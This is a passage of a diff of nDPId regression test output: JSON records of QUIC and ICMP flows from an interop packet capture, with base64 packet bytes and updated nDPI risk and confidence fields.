7wnFa\/vovEOpHWQnRJdHbza2NFUFRaTbJ66fHDPe80KPiiYdWaTjiZGLbnVxj5cnNPjgcS9riI0x\/vjDtGbui32zd2k19XAk8XSvXovnq\/N1aEblwY4nUP5VKVuQkxHivQFDAXb94K1J5M36udsQd6LdTQRFPp1uq8xtKCFuK6p8iHZhrHLCcSPXYOeddA4eGHDK9as2MSP81cihu\/T7DLy1YjlKcHYzDa3yx1xCoO5FKkG6fm9bswGYlU\/+baDbYfTkQsLCEaPlRnxA9WTERJJ+MSFDRHu\/PlPFJ7insUQmyVmaD3hw4umIBuOag4GPXKlW2orVcqPhx98PvrVSXrWoJ9fVfyaRdjVGS9oRlA6aO0YTRViOTKSEUuyp112T1TQFZCnuDnAkxVoRPmo9aTNWuTZ9TG1q3dK8ixFuLxOAzdvDCKb+Mw\/ATbe3lk+yLwq8IFMq6jKdrgufqcgEK\/DE45uK6DkeDtg2Nfk41dXE6E2W06tsmVdvKzE9ZnBhUhe2ejOTPCQOMOhKKxW1gu5IyfCpHbjJN2vfvhyPN0OnZybFzDxqcGmwjQ+YG+BTWqim17tKyUSWvtfljnxHMSsPqRy6Y6NfBCNp1aUpwRPLdmmujG8IVPEXIU\/kof9d0KApSsa1g5\/lxQVV6EBiKhgM1boWQ5RBl6ra1rwDg1yBBAJS3flCp5HcSZz1flGcqFaVEsVrUVz+AEXY9ruE1orPMbY+wl+lHasmZLW74cTNm+UINmjH3A+DsXhcmXvfEm5hNNThZ\/NnJpbpD4NH5H02TzCShSKgJ69RlVFghhhWba9V1v0pJT8dy2Wkw9Ko6Pt9n7LOTgLjbmfTwItWhZTZuppOfwln5Ay+ujYsECxELS1meSTPXMgPFm5ZqFNUQ4ewBWDBiyF0UuaCFEJLCwQMzr3L1MCmNTV6WeniY70fageRh2KTa3ox9TKmffiA5zTBLt8Z7BCR5or8UDQn5nVW9FpnezChyvtJGlUcukrf1\/2Yv6T6Ix+RUzOFNkHL\/DYqhcyt5IZvOgg9EpYeiSpp\/jf5smjFh0ytesmJY86N5x+rphh2jl\/Hh13FoM1EltzV1MqIusbwoLTLdDb5Z6FDqYBCG0rctA=="}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 01183{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1603816434609,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434609,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA990AAC0BNLcznmliwKgBgAMKP5oAAAAARQAFAKEiQAAwEUWiwKgBgDOeaWLKrwG7BOynncIKCgoKCBGs9QKfvVcQAABE0lvluJrmL\/hMeUw3YRhBIJ\/7gLtKpaIz\/yfYSAz6s8M\/iZU1xT7UiPmoiPsMT3FCwMnulK4pxlFMwSTfXCJHpc614jjRRPQY0r4A52kRAqbpnpm4pGdhwJNk2VhjYh04QB+ATZnDkcsklWaxwa1n6YHU9l\/hwXdVfRMJRZaRjlnNVjFzYTJDWF1bqR3R+8VW0waOTiwhJbmwo0jy0HGIxrRni0iCPehpoLwTjyK71TyZayvNhxdtGvZzTbpHaeAT15y\/CNrfq29HSv4IbvE0UmtwPnAkf\/K1m2amootTqW7mZ0NRHFK3HiA6yyoxrFYKU9\/CqXLS00PyxBFYvXIH8JHdvMhif7EW2Q2vZzfwwkJPwkHVXd+ngfY6wGLILtNDXV2ivGtdy3XuvH2ccmQEKSFZ73Hx9iHdBl6qjfCYRhGp6e+IEQqSNu4vIjwJrHd1DI7AFuP5HVV3t0uwiRNlmNLYg\/\/iQ8SXBZOZZXE4JJ7SqpmG4T8bxGnZ3BCjiEFishkM4w78EsJooOt\/y+Ru+rpDXeXF0DEDfcvmU78O5MK3Ul65ZjzZQp5A08B7wuQCd5NseMaqkP4jaydGTyiWvmW0mmoH\/qDqrJMH+DDDY2TMH7n1pK4uNzfng27Vymwlz4bVFY+NOz3R05sw0AhIXP9mFCKSmts="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.654703}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.654703}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1603816434622,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434622,"pkt":"PKn0qB\/spJGxgjQ5ht1gDsWjACMR8CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9EVGcCQAjCvHgAAAAAAAIawwAN\/DoMJL\/AAAd\/wAAHP8AABs="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAStBAAEARganAqAGAyu7cXJgVAbsE7FzZxgoKCgoISaS\/HP4FIE0AAETS8b\/jD+OLMZ5ZfmIPp7wLwtSW\/3e3V56tG1ccXR3vL4iMRvcTifVjxLwR1VEj5kxXicua4ELuOiBh14YJiINigpT2w+4dKhfV++T2HAdDXb9HRo8Wp5\/Q2I0xH7P0GEZjVSlxh\/KVM7Q8JSVkblMvtsmlTbMHoKyKgv5ZVuhR9rKzyWjc0bDTpihNkKGhI2W23K8YpCOo163pvnpUs8vCjpMKx6Y+XLOjz86VHxZ\/dSIUgwZkfU3hXvxraGDqsOM6nk2BsxRj6ED+eksutrG0VvP5Wbl\/nwohJ3snk4n+kCBY8+CDoT5Q6xIqcKNeqA91veY6WDNW65NdLK9tq0Kt6NyRCQ0iHC1fm8oqxzK49Xy9Yr2klZXjGA6Wb9UmYx6KSJdvg6i+UYQf+hP3vTAcVrvclwQjn1Ttts6+sIXx63DdYoKsDizIkqnYCVuj0roAtIdLG95OmHxjKHrmpsQyLltGhTZMsYJQRCx5M8PpL+vjXo6pu+GHq\/GNM20vpbcH4SfliMSbdeHv4qviRxdJ9R8w9OkBT6XZozO3wWdBmA6PqET53j\/ug0iSc1MIiO+\/q4LSySrTDiP2OBzfwZT7hTAaYz1DN1CxY6wbbPEjnyqCdpqZ1PaOkaWb8OYt7bm6J9VMzWbMZaVbajU0njanBfI51vKbom0V4qvMvcrqXEEunVPVtjgIskNplvDAftVJ2vZJjRMGUEv2c4SLniMT\/gRm2OeeaPXHe1brAnbRvP5KwVwSyHq8W08M66VBt+caimizIdJuqJqF1FGzRpHgQJNETaOqosq4CaLQrU1BEEg3UbRSYSWKj7OLTgEqG1JOZb\/nz1GI+TfOOMiy+107aqM+S\/i3Tju69xYk1X3WP1Ozrd6Wj6AC50FxHQQFSXlNPa5e\/vjVo4rFyU+uJE9u8JoYphh7MyJDB1VngH+kgiqxcBa2QBM5E51d4uR1hQLe+c6gd3MDh43gdsQryQiQifYdGhNRWZZaw2p8fRtUP4Uwyq\/B0bHFpZ4t6PuvIBU1+212nGGZUAL7j3HFR48RnO1qbO+GAhey5N9lWYMlU5tavGiXfOhlX6cAsUEQ2Q6TLV\/ZCB5CQG5QDTtdPH0QZSPPPDEVyy6HE2QB0rH4vjru2j5voDUPBjLlpBQ\/NL5R+mTgOnDFh7tGqQnBHhyDGFO\/50NeIGNTAc07+9N1IfFyQChGLc3grwS1SkOgfURlQLF+0ioikEL5irbMrmWTd851GONI9exui+8KOT8c959NcGrcyY1CIpxJc6JPQNgq4cGI4ljycOhrXFfcY+tJlEO3E0yGYN4gMAGSars7BkXFZLPWbZY+Sb4jXpDImxv+f95nzmTySeAQGcAaOitCLcJ318ljtkj4SzzBlngK7\/jHpA1EPvZ2SJKmWjryUfQf4JJVEzK0DHUTA6qLYV+785FtwR53Rvcfx8ZKasxHIdWmDmMQfSDcjCfFkiPKXadftOSR0e\/XsF34XRoyBUx5eKGVWThXeNxNkMdpKbVofP1BRG3kl02O63aebe4V6uZI5YzyQUh4Dl097fgC5KIZDSXh1zEWqkg2eojIxOsLE8glsZ++gAFLU+Q749QmZTjBy2vyjMlxdSRKWMC6H66lOKBGFFFOZV6nr8Cmiz6E4iT7yg=="}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00640{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sht1gCIsNBNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmdzC8RUgTYW27FCgoKCgiOjC+QJeVzXQAARL7JSt9fXYbHm89vAcaC3zVPl3CRJrP6TUqyl19zIq90T7T2NXCDcXHJobasDcuXuTxPvCCLEvFASvzCuAXXUk3HWjKo77c+LloXAI84Zwqo8KPwvyzsluIwpPaCQQSGiuEyjDniWlSc55j3zHtvxBYI+7qs\/+m2E9Qo9cHvaYLyJZyEsYiKOdymD9qvtzbmDAszHuIEjcfE2JjV4l3DJqKhapzLQbS9PctxujyF1VUI2ACV8ytLLBKZMFRXoJlO+bWzOXqbJSZ6o5mClNhR1vsaR6skwjkGqVgCBLklKilA+9\/6l4ZG3WIaUFiUoM7SgIxwWF8oyiKV7zmkaclu4f5\/3yzgGms+jvNfvtwGzb3Fgy2XF4aZ5O5HDcLbhvsSrvGKNU1KYKAXZ4nH8RB1\/jFqFn4mCqeFIiG1sLtiDLSix9f1+6LcFT10dfWo8qUHWrWQKOTbIY9nDBXTCntoa14qK3CE8mecM2VJ7ggYOHeAYHiK\/KSjuFeEFZdZUdhlNNgz9SYFL52F6XzgaZRwl5PM1sfRI+PVfN3H8HWyDW3URl12iKPr73MNCK5qktammCheXnaJBQPkIp2os8caGwd0tnC6YXcJ6lRUUduYnFyZK+vu28T7Dz\/LrOOfuQtWldYrGOIU6j6+ccDKu9WWuVGuX87kKb6hFa\/0Hcn3qf5Lj8lhGc0veQe668VrdjsW9Dbg+kfK24zU3dHzbLq\/XM+CIHEV0Yi\/cWiNNyuRa7ulzdTCAyRs9gYlEY9PmbmMmVnZTQWIYxLrJJXunKhqYDK1mFGTl5IvfBZY7XkX4mf2dHPjv4NDEk1QrCa1hHmGBMvl396\/dwaT6SqqWUBPCDC6vSElGrAMRRGJq9LvfuTt+lbz304CY2d8TLKimJoo6M2hj9FCUJij7LzuvBHoekrCNTyCpGkXK+6f28WuMzCkJmtH+2+vwCZ0cKmQ7CrGhhaebnvQZwlEFUK4HQuJy5pSXRkTWfe3guDQnvG2+9SrouXEZwHBxw4mhOlu4pZjXEqExMqWvswlRLClP4rnliDXpHH40rXKEVBoT8v\/j3qP19acEvtZNPaR+ixqYrvXUyjrT2RlXNw57\/diViUriBwdc6BZan7TmLF2I9JRDJyDmqg737XOiOdNXmktfhguZlHvtu8BzXOxe9QBMRua9UDc+uCEMwFmlIsRXS+UZdgutMlJZ1Lbmq8+H9dnSORxZcpeFndW83URbDqnqh3rTxU46PizBvjU3UUHxGcviHiAab4O\/xs7Wgwm5afjOM4HWTr2GZZohe06rmbLxZYWQRT95qnnPQz6O3YXVkngtM49zsYfYtwWc\/15r8OVdncTVWq9tmcsY+IComKrHlZhTs92vAihW5Z6kvjaWc9ntG7+kh9ebleS75pVIAPP3qfgdh\/HVMZQrPcJuQH8Y\/E2UgruG3vXoC9MYlyYHSvs\/p0NoudzrUECbg4P227GFsxLEbPUVjR8LlC7rVNTvhNIZWwC\/QrTxuvgRdHhiNNC8M2PCOHRg+GtiTF2\/CGbeBUpGmKvLPodeqZZylHTZhjgU1MkqVoyyY00fBkWduQkCMwlkuamhmTtYdY4kHKiR0ij2DmQLnLbFkclRCdK5g1smA=="}
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sht1gBiRvBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTABx2ARUQTYzffDCgoKCggnNhDgZJaMQwAARL5IzeYAwPvJhqXqSzYyuvoAe\/H9DvMh4rH9IopmFLLCj+PhBdGZ40ll7ADayrGRVomiqXfQeeqE4lI0JVucWTRV10wN\/2X8338TTB6+1v0VW\/8KTorpg06AYkrrASXu2b1BsrKpwLL271kd\/dx+mnQSA2BQKuHrVBCwcaBHI0r8YyjQ1srYGqRDA+zKcgWvk4OEb2anzxkS+TxZp3BCgoJSxTVTaR5r447ESHGMmgukiZT5KEHWyWxF9d02oG1WB5o1fyWZF5XPYIfDooBiT1AvbGvAvfKT01RDHMenDf9O5UT9ob9+XRCiw125P6PnFWGEuoX7atzAW9zVIg++DcOuD6bQBa6hwrgrZiQuNBd8kuQqMdvHefesXx4K8g4hi0yN8Q2JiBx10ybm+sDchOmA+ZGI3KJA9MxZ0Sp73D0+bCJe480Wpk3E7r2Z4INozKeBGUIjWkyo7qFkmuan\/71DIvrB9t\/xagwgNTTJ3tPFFcZxULz8+MN\/EAmmnIbFUMJkGpaxaZkxUwzdBzzVfWgWxOxaXp6E\/Sp0HvH7wVBpKbhjbMf7v+XMfDLFzWRXSgKS3UI3Pb2wyqIDyMku47b+QW5Q8ogC6pRm7vw2ChoPyXCwYbBnsPUrSwZulaXZ21SytHaEU9+EZo8BWLIhbxHDWCqgcwiQOrN2ld6qsp3S\/Vk9wosbHKzGjZ8Fq0IulMECZI2u3F39UfOXkQRBydLXb8SJP0YbtSDYwJVwphKDdTuYShkSh02mqvLr++kOOrUBElEDb2FTjuj4gpf7X+VxQEKj1eV44pEqEnAkpTwMxZvrlvupezB2DaPuSdgJ2oTp\/O7zZVUZF0m\/4ldGEeQhWTjIV6CkEIKpRvwcA+UXJ\/KFZ8RG5C3FjLxgW6qDeZaa51INZ1jnCY0wbHYbjsu1o4BqZImbBcIYiSFGPgjyz05R3AU2gPyjMwQtepARpLhB2m2nPYRAMfmllWHd3xwrKK3Glp060Yi1hFmvIsxBYN\/HFmXph\/R7xAQ\/NCCsyb233XTR61h+5mjyr3kBdhvRp4FWAfrGEcdmYH09lxw8fsoI2fyGmlrIiLbF3Ib+dz+bKp06GWcTagDImEuKvHXDoqew6XT8CRp81NMwgYp2C0sRRT0X375VlYNNoST080OfYYTMWSZLZIXQh8aObm1WMLPdvWnM+yeTd\/mCvRRGkSoRfYLC7RPv4Px+NqngI+PBo1onxLjP+L4PKyIXY5M1Wb\/ntYVcCVD6Mu2L9o7pVgw2OSUjjv0o88lqeZ+5ZeeRR6GyrHda3BrAmnkZ+qpQgDgKYZH0YS\/dr3\/dP2b05Ar17LfJufSjGiJu4ojISm\/iPkcpJzhCB0Ulyrv0Qi0cZ\/5EJ37Gp3EGx9wtbixPCiSDCeFvjur1Q9TswIkIMcYKjzlTF8c4ari4VRXM+F7\/DFMpQowUPXMsTOknhf+QiC8PtIgajvJPz0z4ts8GtDrZNFWP1dmxLaXIf8adUNIotOd08gg+Fo+EaXwzTPqlyv8pnBs9YKcfmrjrW8mdx7psWvRm4G1XHb9iD7+F8FJK6uKYd40yFQLCG28wXMkr8rTqhU71QNHZ421qXPLwoECcRhsDGlUiQgzViqn2CQ=="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
